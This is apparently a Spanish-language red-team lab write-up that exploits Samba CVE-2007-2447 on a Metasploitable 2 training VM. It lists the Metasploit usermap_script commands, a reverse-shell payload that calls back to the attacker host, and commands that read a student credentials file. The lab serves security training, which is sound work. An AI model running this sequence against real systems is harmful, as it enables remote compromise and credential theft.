
Laboratorio de pruebas de penetración paso a paso explotando Samba CVE-2007-2447 en Metasploitable 2 usando Metasploit, demostrando compromiso de root, robo de credenciales y exfiltración de datos para entrenamiento educativo de equipo rojo.
RedTeam-SMB-PenTest |
|
msfconsole
Asegúrese de que tanto el host atacante como la máquina víctima estén encendidos y en ejecución.

search samba
use exploit/multi/samba/usermap_script
set RHOST <target_ip>
set LHOST <attacker_ip>
set payload cmd/unix/reverse
exploit
whoami
hostname
cd /redteam7/student3
cat mypass.txt
# Salir del shell actual
Ctrl C
exit
# Matar todos los trabajos en segundo plano
sessions -K
jobs -K
# Reiniciar Metasploit
msfconsole
usermap_script son altamente vulnerables.| Componente | Detalles |
|---|
| VM Atacante | Kali Linux |
| VM Víctima | Metasploitable 2 |
| Puerto Objetivo | 445 (Samba/SMB) |
| Exploit Utilizado | exploit/multi/samba/usermap_script |
| Objetivo de Credenciales | /redteam7/student3/mypass.txt |